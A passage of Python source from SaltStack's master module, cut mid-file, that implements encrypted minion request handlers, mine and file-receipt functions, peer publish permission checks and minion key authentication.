self.k_mtime: # new key, refresh crypticle with salt.utils.fopen(dfn) as fp_: aes = fp_.read() if len(aes) != 76: return self.crypticle = salt.crypt.Crypticle(self.opts, aes) self.clear_funcs.crypticle = self.crypticle self.clear_funcs.opts['aes'] = aes self.aes_funcs.crypticle = self.crypticle self.aes_funcs.opts['aes'] = aes self.k_mtime = stats.st_mtime def run(self): ''' Start a Master Worker ''' self.clear_funcs = ClearFuncs( self.opts, self.key, self.mkey, self.crypticle) self.aes_funcs = AESFuncs(self.opts, self.crypticle) self.__bind() class AESFuncs(object): ''' Set up functions that are available when the load is encrypted with AES ''' # The AES Functions: # def __init__(self, opts, crypticle): self.opts = opts self.event = salt.utils.event.MasterEvent(self.opts['sock_dir']) self.serial = salt.payload.Serial(opts) self.crypticle = crypticle self.ckminions = salt.utils.minions.CkMinions(opts) # Create the tops dict for loading external top data self.tops = salt.loader.tops(self.opts) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Create the master minion to access the external job cache self.mminion = salt.minion.MasterMinion( self.opts, states=False, rend=False) self.__setup_fileserver() def __setup_fileserver(self): ''' Set the local file objects from the file server interface ''' fs_ = salt.fileserver.Fileserver(self.opts) self._serve_file = fs_.serve_file self._file_hash = fs_.file_hash self._file_list = fs_.file_list self._file_list_emptydirs = fs_.file_list_emptydirs self._dir_list = fs_.dir_list self._symlink_list = fs_.symlink_list self._file_envs = fs_.envs def __verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key ''' if not salt.utils.verify.valid_id(self.opts, id_): return False pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_) with salt.utils.fopen(pub_path, 'r') as fp_: minion_pub = fp_.read() tmp_pub = salt.utils.mkstemp() with salt.utils.fopen(tmp_pub, 'w+') as fp_: fp_.write(minion_pub) pub = None try: pub = RSA.load_pub_key(tmp_pub) except RSA.RSAError as err: log.error('Unable to load temporary public key "{0}": {1}' .format(tmp_pub, err)) try: os.remove(tmp_pub) if pub.public_decrypt(token, 5) == 'salt': return True except RSA.RSAError as err: log.error('Unable to decrypt token: {0}'.format(err)) log.error('Salt minion claiming to be {0} has attempted to' 'communicate with the master and could not be verified' .format(id_)) return False def __verify_minion_publish(self, clear_load): ''' Verify that the passed information authorized a minion to execute ''' # Verify that the load is valid if 'peer' not in self.opts: return False if not isinstance(self.opts['peer'], dict): return False if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')): return False # If the command will make a recursive publish don't run if clear_load['fun'].startswith('publish.'): return False # Check the permissions for this minion if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( ( 'Minion id {0} is not who it says it is and is attempting ' 'to issue a peer command' ).format(clear_load['id']) ) return False clear_load.pop('tok') perms = [] for match in self.opts['peer']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! if isinstance(self.opts['peer'][match], list): perms.extend(self.opts['peer'][match]) if ',' in clear_load['fun']: # 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']] clear_load['fun'] = clear_load['fun'].split(',') arg_ = [] for arg in clear_load['arg']: arg_.append(arg.split()) clear_load['arg'] = arg_ # finally, check the auth of the load return self.ckminions.auth_check( perms, clear_load['fun'], clear_load['tgt'], clear_load.get('tgt_type', 'glob')) def _ext_nodes(self, load): ''' Return the results from an external node classifier if one is specified ''' if 'id' not in load: log.error('Received call for external nodes without an id') return {} if not salt.utils.verify.valid_id(self.opts, load['id']): return {} if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') ret = {} # The old ext_nodes method is set to be deprecated in 0.10.4 # and should be removed within 3-5 releases in favor of the # "master_tops" system if self.opts['external_nodes']: if not salt.utils.which(self.opts['external_nodes']): log.error(('Specified external nodes controller {0} is not' ' available, please verify that it is installed' '').format(self.opts['external_nodes'])) return {} cmd = '{0} {1}'.format(self.opts['external_nodes'], load['id']) ndata = yaml.safe_load( subprocess.Popen( cmd, shell=True, stdout=subprocess.PIPE ).communicate()[0]) if 'environment' in ndata: saltenv = ndata['environment'] else: saltenv = 'base' if 'classes' in ndata: if isinstance(ndata['classes'], dict): ret[saltenv] = list(ndata['classes']) elif isinstance(ndata['classes'], list): ret[saltenv] = ndata['classes'] else: return ret # Evaluate all configured master_tops interfaces opts = {} grains = {} if 'opts' in load: opts = load['opts'] if 'grains' in load['opts']: grains = load['opts']['grains'] for fun in self.tops: if fun not in self.opts.get('master_tops', {}): continue try: ret.update(self.tops[fun](opts=opts, grains=grains)) except Exception as exc: # If anything happens in the top generation, log it and move on log.error( 'Top function {0} failed with error {1} for minion ' '{2}'.format( fun, exc, load['id'] ) ) return ret def _master_opts(self, load): ''' Return the master options to the minion ''' mopts = {} file_roots = {} envs = self._file_envs() for saltenv in envs: if saltenv not in file_roots: file_roots[saltenv] = [] mopts['file_roots'] = file_roots if load.get('env_only'): return mopts mopts['renderer'] = self.opts['renderer'] mopts['failhard'] = self.opts['failhard'] mopts['state_top'] = self.opts['state_top'] mopts['nodegroups'] = self.opts['nodegroups'] mopts['state_auto_order'] = self.opts['state_auto_order'] mopts['state_events'] = self.opts['state_events'] mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks'] mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks'] return mopts def _mine_get(self, load): ''' Gathers the data from the specified minions' mine ''' if any(key not in load for key in ('id', 'tgt', 'fun')): return {} if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') if 'mine_get' in self.opts: # If master side acl defined. if not isinstance(self.opts['mine_get'], dict): return {} perms = set() for match in self.opts['mine_get']: if re.match(match, load['id']): if isinstance(self.opts['mine_get'][match], list): perms.update(self.opts['mine_get'][match]) if not any(re.match(perm, load['fun']) for perm in perms): return {} ret = {} if not salt.utils.verify.valid_id(self.opts, load['id']): return ret checker = salt.utils.minions.CkMinions(self.opts) minions = checker.check_minions( load['tgt'], load.get('expr_form', 'glob') ) for minion in minions: mine = os.path.join( self.opts['cachedir'], 'minions', minion, 'mine.p') try: with salt.utils.fopen(mine, 'rb') as fp_: fdata = self.serial.load(fp_).get(load['fun']) if fdata: ret[minion] = fdata except Exception: continue return ret def _mine(self, load): ''' Return the mine data ''' if 'id' not in load or 'data' not in load: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') if self.opts.get('minion_data_cache', False) or self.opts.get('enforce_mine_cache', False): cdir = os.path.join(self.opts['cachedir'], 'minions', load['id']) if not os.path.isdir(cdir): os.makedirs(cdir) datap = os.path.join(cdir, 'mine.p') if not load.get('clear', False): if os.path.isfile(datap): with salt.utils.fopen(datap, 'rb') as fp_: new = self.serial.load(fp_) if isinstance(new, dict): new.update(load['data']) load['data'] = new with salt.utils.fopen(datap, 'w+b') as fp_: fp_.write(self.serial.dumps(load['data'])) return True def _mine_delete(self, load): ''' Allow the minion to delete a specific function from its own mine ''' if 'id' not in load or 'fun' not in load: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') if self.opts.get('minion_data_cache', False) or self.opts.get('enforce_mine_cache', False): cdir = os.path.join(self.opts['cachedir'], 'minions', load['id']) if not os.path.isdir(cdir): return True datap = os.path.join(cdir, 'mine.p') if os.path.isfile(datap): try: with salt.utils.fopen(datap, 'rb') as fp_: mine_data = self.serial.load(fp_) if isinstance(mine_data, dict): if mine_data.pop(load['fun'], False): with salt.utils.fopen(datap, 'w+b') as fp_: fp_.write(self.serial.dumps(mine_data)) except OSError: return False return True def _mine_flush(self, load): ''' Allow the minion to delete all of its own mine contents ''' if 'id' not in load: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') if self.opts.get('minion_data_cache', False) or self.opts.get('enforce_mine_cache', False): cdir = os.path.join(self.opts['cachedir'], 'minions', load['id']) if not os.path.isdir(cdir): return True datap = os.path.join(cdir, 'mine.p') if os.path.isfile(datap): try: os.remove(datap) except OSError: return False return True def _file_recv(self, load): ''' Allows minions to send files to the master, files are sent to the master file cache ''' if any(key not in load for key in ('id', 'path', 'loc')): return False if not self.opts['file_recv'] or os.path.isabs(load['path']): return False if os.path.isabs(load['path']) or '../' in load['path']: # Can overwrite master files!! return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False file_recv_max_size = 1024*1024 * self.opts.get('file_recv_max_size', 100) if len(load['data']) + load.get('loc', 0) > file_recv_max_size: log.error( 'Exceeding file_recv_max_size limit: {0}'.format( file_recv_max_size ) ) return False if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') cpath = os.path.join( self.opts['cachedir'], 'minions', load['id'], 'files', load['path']) cdir = os.path.dirname(cpath) if not os.path.isdir(cdir): try: os.makedirs(cdir) except os.error: pass if os.path.isfile(cpath) and load['loc'] != 0: mode = 'ab' else: mode = 'wb' with salt.utils.fopen(cpath, mode) as fp_: if load['loc']: fp_.seek(load['loc']) fp_.write(load['data']) return True def _pillar(self, load): ''' Return the pillar data for the minion ''' if any(key not in load for key in ('id', 'grains')): return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False load['grains']['id'] = load['id'] mods = set() for func in self.mminion.functions.values(): mods.add(func.__module__) for mod in mods: sys.modules[mod].__grains__ = load['grains'] pillar = salt.pillar.Pillar( self.opts, load['grains'], load['id'], load.get('saltenv', load.get('env')), load.get('ext'), self.mminion.functions) data = pillar.compile_pillar() if self.opts.get('minion_data_cache', False): cdir = os.path.join(self.opts['cachedir'], 'minions', load['id']) if not os.path.isdir(cdir): os.makedirs(cdir) datap = os.path.join(cdir, 'data.p') with salt.utils.fopen(datap, 'w+b') as fp_: fp_.write( self.serial.dumps( {'grains': load['grains'], 'pillar': data}) ) for mod in mods: sys.modules[mod].__grains__ = self.opts['grains'] return data def _minion_event(self, load): ''' Receive an event from the minion and fire it on the master event interface ''' if 'id' not in load: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False if 'tok' not in load: log.error( 'Received incomplete call from {0} for {1!r}, missing {2!r}' .format( load['id'], inspect_stack()['co_name'], 'tok' )) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') if 'events' not in load and ('tag' not in load or 'data' not in load): return False if 'events' in load: for event in load['events']: self.event.fire_event(event, event['tag']) # old dup event if load.get('pretag') is not None: self.event.fire_event(event, tagify(event['tag'], base=load['pretag'])) else: tag = load['tag'] self.event.fire_event(load, tag) return True def _return(self, load): ''' Handle the return data sent from the minions ''' # If the return data is invalid, just ignore it if any(key not in load for key in ('return', 'jid', 'id')): return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False if load['jid'] == 'req': # The minion is returning a standalone job, request a jobid load['arg'] = load.get('arg', load.get('fun_args', [])) load['tgt_type'] = 'glob' load['tgt'] = load['id'] prep_fstr = '{0}.prep_jid'.format(self.opts['master_job_cache']) load['jid'] = self.mminion.returners[prep_fstr](nocache=load.get('nocache', False)) # save the load, since we don't have it saveload_fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[saveload_fstr](load['jid'], load) log.info('Got return from {id} for job {jid}'.format(**load)) self.event.fire_event(load, load['jid']) # old dup event self.event.fire_event( load, tagify([load['jid'], 'ret', load['id']], 'job')) self.event.fire_ret_load(load) # if you have a job_cache, or an ext_job_cache, don't write to the regular master cache if not self.opts['job_cache'] or self.opts.get('ext_job_cache'): return # otherwise, write to the master cache fstr = '{0}.returner'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](load) def _syndic_return(self, load): ''' Receive a syndic minion return and format it to look like returns from individual minions. ''' # Verify the load if any(key not in load for key in ('return', 'jid', 'id')): return None # if we have a load, save it if 'load' in load: fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](load['jid'], load) # Format individual return loads for key, item in load['return'].items(): ret = {'jid': load['jid'], 'id': key, 'return': item} if 'out' in load: ret['out'] = load['out'] self._return(ret) def minion_runner(self, clear_load): ''' Execute a runner from a minion, return the runner's function data ''' if 'peer_run' not in self.opts: return {} if not isinstance(self.opts['peer_run'], dict): return {} if any(key not in clear_load for key in ('fun', 'arg', 'id', 'tok')): return {} if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( clear_load['id'] ) ) return {} clear_load.pop('tok') perms = set() for match in self.opts['peer_run']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! if isinstance(self.opts['peer_run'][match], list): perms.update(self.opts['peer_run'][match]) good = False for perm in perms: if re.match(perm, clear_load['fun']): good = True if not good: return {} # Prepare the runner object opts = {'fun': clear_load['fun'], 'arg': clear_load['arg'], 'id': clear_load['id'], 'doc': False, 'conf_file': self.opts['conf_file']} opts.update(self.opts) runner = salt.runner.Runner(opts) return runner.run() def pub_ret(self, load): ''' Request the return data from a specific jid, only allowed if the requesting minion also initialted the execution. ''' if any(key not in load for key in ('jid', 'id', 'tok')): return {} if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( 'Minion id {0} is not who it says it is!'.format( load['id'] ) ) return {} load.pop('tok') # Check that this minion can access this data auth_cache = os.path.join( self.opts['cachedir'], 'publish_auth') if not os.path.isdir(auth_cache): os.makedirs(auth_cache) jid_fn = os.path.join(auth_cache, load['jid']) with salt.utils.fopen(jid_fn, 'r') as fp_: if not load['id'] == fp_.read(): return {} # Grab the latest and return return self.local.get_cache_returns(load['jid']) def minion_pub(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: peer: .*: - .* This configuration will enable all minions to execute all commands. peer: foo.example.com: - test.* This configuration will only allow the minion foo.example.com to execute commands from the test module ''' if not self.__verify_minion_publish(clear_load): return {} # Set up the publication payload load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'expr_form': clear_load.get('tgt_type', 'glob'), 'tgt': clear_load['tgt'], 'ret': clear_load['ret'], 'id': clear_load['id'], } if 'tgt_type' in clear_load: if clear_load['tgt_type'].startswith('node'): if clear_load['tgt'] in self.opts['nodegroups']: load['tgt'] = self.opts['nodegroups'][clear_load['tgt']] load['expr_form_type'] = 'compound' load['expr_form'] = clear_load['tgt_type'] else: return {} else: load['expr_form'] = clear_load['tgt_type'] ret = {} ret['jid'] = self.local.cmd_async(**load) ret['minions'] = self.ckminions.check_minions( clear_load['tgt'], load['expr_form']) auth_cache = os.path.join( self.opts['cachedir'], 'publish_auth') if not os.path.isdir(auth_cache): os.makedirs(auth_cache) jid_fn = os.path.join(auth_cache, ret['jid']) with salt.utils.fopen(jid_fn, 'w+') as fp_: fp_.write(clear_load['id']) return ret def minion_publish(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: peer: .*: - .* This configuration will enable all minions to execute all commands. peer: foo.example.com: - test.* This configuration will only allow the minion foo.example.com to execute commands from the test module ''' if not self.__verify_minion_publish(clear_load): return {} # Set up the publication payload load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'expr_form': clear_load.get('tgt_type', 'glob'), 'tgt': clear_load['tgt'], 'ret': clear_load['ret'], 'id': clear_load['id'], } if 'tmo' in clear_load: try: load['timeout'] = int(clear_load['tmo']) except ValueError: msg = 'Failed to parse timeout value: {0}'.format( clear_load['tmo']) log.warn(msg) return {} if 'timeout' in clear_load: try: load['timeout'] = int(clear_load['timeout']) except ValueError: msg = 'Failed to parse timeout value: {0}'.format( clear_load['tmo']) log.warn(msg) return {} if 'tgt_type' in clear_load: if clear_load['tgt_type'].startswith('node'): if clear_load['tgt'] in self.opts['nodegroups']: load['tgt'] = self.opts['nodegroups'][clear_load['tgt']] load['expr_form_type'] = 'compound' else: return {} else: load['expr_form'] = clear_load['tgt_type'] load['raw'] = True ret = {} for minion in self.local.cmd_iter(**load): if clear_load.get('form', '') == 'full': data = minion if 'jid' in minion: ret['__jid__'] = minion['jid'] data['ret'] = data.pop('return') ret[minion['id']] = data else: ret[minion['id']] = minion['return'] if 'jid' in minion: ret['__jid__'] = minion['jid'] for key, val in self.local.get_cache_returns(ret['__jid__']).items(): if not key in ret: ret[key] = val if clear_load.get('form', '') != 'full': ret.pop('__jid__') return ret def revoke_auth(self, load): ''' Allow a minion to request revocation of its own key ''' if 'id' not in load or 'tok' not in load: return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warn( ( 'Minion id {0} is not who it says it is and is attempting ' 'to revoke the key for {0}' ).format(load['id']) ) return False keyapi = salt.key.Key(self.opts) keyapi.delete_key(load['id']) return True def run_func(self, func, load): ''' Wrapper for running functions executed with AES encryption ''' # Don't honor private functions if func.startswith('__'): return self.crypticle.dumps({}) # Run the func if hasattr(self, func): try: start = time.time() ret = getattr(self, func)(load) log.trace( 'Master function call {0} took {1} seconds'.format( func, time.time() - start ) ) except Exception: ret = '' log.error( 'Error in function {0}:\n'.format(func), exc_info=True ) else: log.error( 'Received function {0} which is unavailable on the master, ' 'returning False'.format( func ) ) return self.crypticle.dumps(False) # Don't encrypt the return value for the _return func # (we don't care about the return value, so why encrypt it?) if func == '_return': return ret if func == '_pillar' and 'id' in load: if load.get('ver') != '2' and self.opts['pillar_version'] == 1: # Authorized to return old pillar proto return self.crypticle.dumps(ret) # encrypt with a specific AES key pubfn = os.path.join(self.opts['pki_dir'], 'minions', load['id']) key = salt.crypt.Crypticle.generate_key_string() pcrypt = salt.crypt.Crypticle( self.opts, key) try: pub = RSA.load_pub_key(pubfn) except RSA.RSAError: return self.crypticle.dumps({}) pret = {} pret['key'] = pub.public_encrypt(key, 4) pret['pillar'] = pcrypt.dumps( ret if ret is not False else {} ) return pret # AES Encrypt the return return self.crypticle.dumps(ret) class ClearFuncs(object): ''' Set up functions that are safe to execute when commands sent to the master without encryption and authentication ''' # The ClearFuncs object encapsulates the functions that can be executed in # the clear: # publish (The publish from the LocalClient) # _auth def __init__(self, opts, key, master_key, crypticle): self.opts = opts self.serial = salt.payload.Serial(opts) self.key = key self.master_key = master_key self.crypticle = crypticle # Create the event manager self.event = salt.utils.event.MasterEvent(self.opts['sock_dir']) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Make an minion checker object self.ckminions = salt.utils.minions.CkMinions(opts) # Make an Auth object self.loadauth = salt.auth.LoadAuth(opts) # Stand up the master Minion to access returner data self.mminion = salt.minion.MasterMinion( self.opts, states=False, rend=False) # Make a wheel object self.wheel_ = salt.wheel.Wheel(opts) def __check_permissions(self, filename): ''' Check if the specified filename has correct permissions ''' if salt.utils.is_windows(): return True # After we've ascertained we're not on windows try: user = self.opts['user'] pwnam = pwd.getpwnam(user) uid = pwnam[2] gid = pwnam[3] groups = salt.utils.get_gid_list(user, include_default=False) except KeyError: log.error( 'Failed to determine groups for user {0}. The user is not ' 'available.\n'.format( user ) ) return False fmode = os.stat(filename) if os.getuid() == 0: if fmode.st_uid == uid or fmode.st_gid != gid: return True elif self.opts.get('permissive_pki_access', False) \ and fmode.st_gid in groups: return True else: if stat.S_IWOTH & fmode.st_mode: # don't allow others to write to the file return False # check group flags if self.opts.get('permissive_pki_access', False) \ and stat.S_IWGRP & fmode.st_mode: return True elif stat.S_IWGRP & fmode.st_mode: return False # check if writable by group or other if not (stat.S_IWGRP & fmode.st_mode or stat.S_IWOTH & fmode.st_mode): return True return False def __check_signing_file(self, keyid, signing_file): ''' Check a keyid for membership in a signing file ''' if not signing_file or not os.path.exists(signing_file): return False if not self.__check_permissions(signing_file): message = 'Wrong permissions for {0}, ignoring content' log.warn(message.format(signing_file)) return False with salt.utils.fopen(signing_file, 'r') as fp_: for line in fp_: line = line.strip() if line.startswith('#'): continue else: if salt.utils.expr_match(keyid, line): return True return False def __check_autoreject(self, keyid): ''' Checks if the specified keyid should automatically be rejected. ''' return self.__check_signing_file( keyid, self.opts.get('autoreject_file', None) ) def __check_autosign(self, keyid): ''' Checks if the specified keyid should automatically be signed. ''' if self.opts['auto_accept']: return True return self.__check_signing_file( keyid, self.opts.get('autosign_file', None) ) def _auth(self, load): ''' Authenticate the client, use the sent public key to encrypt the AES key which was generated at start up. This method fires an event over the master event manager. The event is tagged "auth" and returns a dict with information about the auth event # Verify that the key we are receiving matches the stored key # Store the key if it is not there # Make an RSA key with the pub key # Encrypt the AES key as an encrypted salt.payload # Package the return and return it ''' if not salt.utils.verify.valid_id(self.opts, load['id']): log.info( 'Authentication request from invalid id {id}'.format(**load) ) return {'enc': 'clear', 'load': {'ret': False}} log.info('Authentication request from {id}'.format(**load)) # Check if key is configured to be auto-rejected/signed auto_reject = self.__check_autoreject(load['id']) auto_sign = self.__check_autosign(load['id']) pubfn = os.path.join(self.opts['pki_dir'], 'minions', load['id']) pubfn_pend = os.path.join(self.opts['pki_dir'], 'minions_pre', load['id']) pubfn_rejected = os.path.join(self.opts['pki_dir'], 'minions_rejected', load['id']) pubfn_denied = os.path.join(self.opts['pki_dir'], 'minions_denied', load['id']) if self.opts['open_mode']: # open mode is turned on, nuts to checks and overwrite whatever # is there pass elif os.path.isfile(pubfn_rejected): # The key has been rejected, don't place it in pending log.info('Public key rejected for {id}'.format(**load)) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} elif os.path.isfile(pubfn): # The key has been accepted, check it if salt.utils.fopen(pubfn, 'r').read() != load['pub']: log.error( 'Authentication attempt from {id} failed, the public ' 'keys did not match. This may be an attempt to compromise ' 'the Salt cluster.'.format(**load) ) # put denied minion key into minions_denied with salt.utils.fopen(pubfn_denied, 'w+') as fp_: fp_.write(load['pub']) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} elif not os.path.isfile(pubfn_pend): # The key has not been accepted, this is a new minion if os.path.isdir(pubfn_pend): # The key path is a directory, error out log.info( 'New public key {id} is a directory'.format(**load) ) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} if auto_reject: key_path = pubfn_rejected log.info('New public key for {id} rejected via autoreject_file' .format(**load)) key_act = 'reject' key_result = False elif not auto_sign: key_path = pubfn_pend log.info('New public key for {id} placed in pending' .format(**load)) key_act = 'pend' key_result = True else: # The key is being automatically accepted, don't do anything # here and let the auto accept logic below handle it. key_path = None if key_path is not None: # Write the key to the appropriate location with salt.utils.fopen(key_path, 'w+') as fp_: fp_.write(load['pub']) ret = {'enc': 'clear', 'load': {'ret': key_result}} eload = {'result': key_result, 'act': key_act, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return ret elif os.path.isfile(pubfn_pend): # This key is in the pending dir and is awaiting acceptance if auto_reject: # We don't care if the keys match, this minion is being # auto-rejected. Move the key file from the pending dir to the # rejected dir. try: shutil.move(pubfn_pend, pubfn_rejected) except (IOError, OSError): pass log.info('Pending public key for {id} rejected via ' 'autoreject_file'.format(**load)) ret = {'enc': 'clear', 'load': {'ret': False}} eload = {'result': False, 'act': 'reject', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return ret elif not auto_sign: # This key is in the pending dir and is not being auto-signed. # Check if the keys are the same and error out if this is the # case. Otherwise log the fact that the minion is still # pending. if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']: log.error( 'Authentication attempt from {id} failed, the public ' 'key in pending did not match. This may be an ' 'attempt to compromise the Salt cluster.' .format(**load) ) # put denied minion key into minions_denied with salt.utils.fopen(pubfn_denied, 'w+') as fp_: fp_.write(load['pub']) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} else: log.info( 'Authentication failed from host {id}, the key is in ' 'pending and needs to be accepted with salt-key ' '-a {id}'.format(**load) ) eload = {'result': True, 'act': 'pend', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': True}} else: # This key is in pending and has been configured to be # auto-signed. Check to see if it is the same key, and if # so, pass on doing anything here, and let it get automatically # accepted below. if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']: log.error( 'Authentication attempt from {id} failed, the public ' 'keys in pending did not match. This may be an ' 'attempt to compromise the Salt cluster.' .format(**load) ) # put denied minion key into minions_denied with salt.utils.fopen(pubfn_denied, 'w+') as fp_: fp_.write(load['pub']) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} else: pass else: # Something happened that I have not accounted for, FAIL! log.warn('Unaccounted for authentication failure') eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} log.info('Authentication accepted from {id}'.format(**load)) # only write to disk if you are adding the file, and in open mode, # which implies we accept any key from a minion (key needs to be # written every time because what's on disk is used for encrypting) if not os.path.isfile(pubfn) or self.opts['open_mode']: with salt.utils.fopen(pubfn, 'w+') as fp_: fp_.write(load['pub']) pub = None # The key payload may sometimes be corrupt when using auto-accept # and an empty request comes in try: pub = RSA.load_pub_key(pubfn) except RSA.RSAError as err: log.error('Corrupt public key "{0}": {1}'.format(pubfn, err)) return {'enc': 'clear', 'load': {'ret': False}} ret = {'enc': 'pub', 'pub_key': self.master_key.get_pub_str(), 'publish_port': self.opts['publish_port'], } if self.opts['auth_mode'] >= 2: if 'token' in load: try: mtoken = self.master_key.key.private_decrypt(load['token'], 4) aes = '{0}_|-{1}'.format(self.opts['aes'], mtoken) except Exception: # Token failed to decrypt, send back the salty bacon to # support older minions pass else: aes = self.opts['aes'] ret['aes'] = pub.public_encrypt(aes, 4) else: if 'token' in load: try: mtoken = self.master_key.key.private_decrypt( load['token'], 4 ) ret['token'] = pub.public_encrypt(mtoken, 4) except Exception: # Token failed to decrypt, send back the salty bacon to # support older minions pass aes = self.opts['aes'] ret['aes'] = pub.public_encrypt(self.opts['aes'], 4) # Be aggressive about the signature digest = hashlib.sha256(aes).hexdigest() ret['sig'] = self.master_key.key.private_encrypt(digest, 5) eload = {'result': True, 'act': 'accept', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return ret def runner(self, clear_load): ''' Send a master control function back to the runner system ''' # All runner ops pass through eauth if 'token' in clear_load: try: token = self.loadauth.get_tok(clear_load['token']) except Exception as exc: msg = 'Exception occurred when generating auth token: {0}'.format( exc) log.error(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if not token: msg = 'Authentication failure of type "token" occurred.' log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if token['eauth'] not in self.opts['external_auth']: msg = 'Authentication failure of type "token" occurred.' log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if token['name'] not in self.opts['external_auth'][token['eauth']]: msg = 'Authentication failure of type "token" occurred.' log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) good = self.ckminions.runner_check( self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'], clear_load['fun']) if not good: msg = ('Authentication failure of type "token" occurred for ' 'user {0}.').format(token['name']) log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) try: fun = clear_load.pop('fun') runner_client = salt.runner.RunnerClient(self.opts) return runner_client.async( fun, clear_load.get('kwarg', {}), token['name']) except Exception as exc: log.error('Exception occurred while ' 'introspecting {0}: {1}'.format(fun, exc)) return dict(error=dict(name=exc.__class__.__name__, args=exc.args, message=exc.message)) if 'eauth' not in clear_load: msg 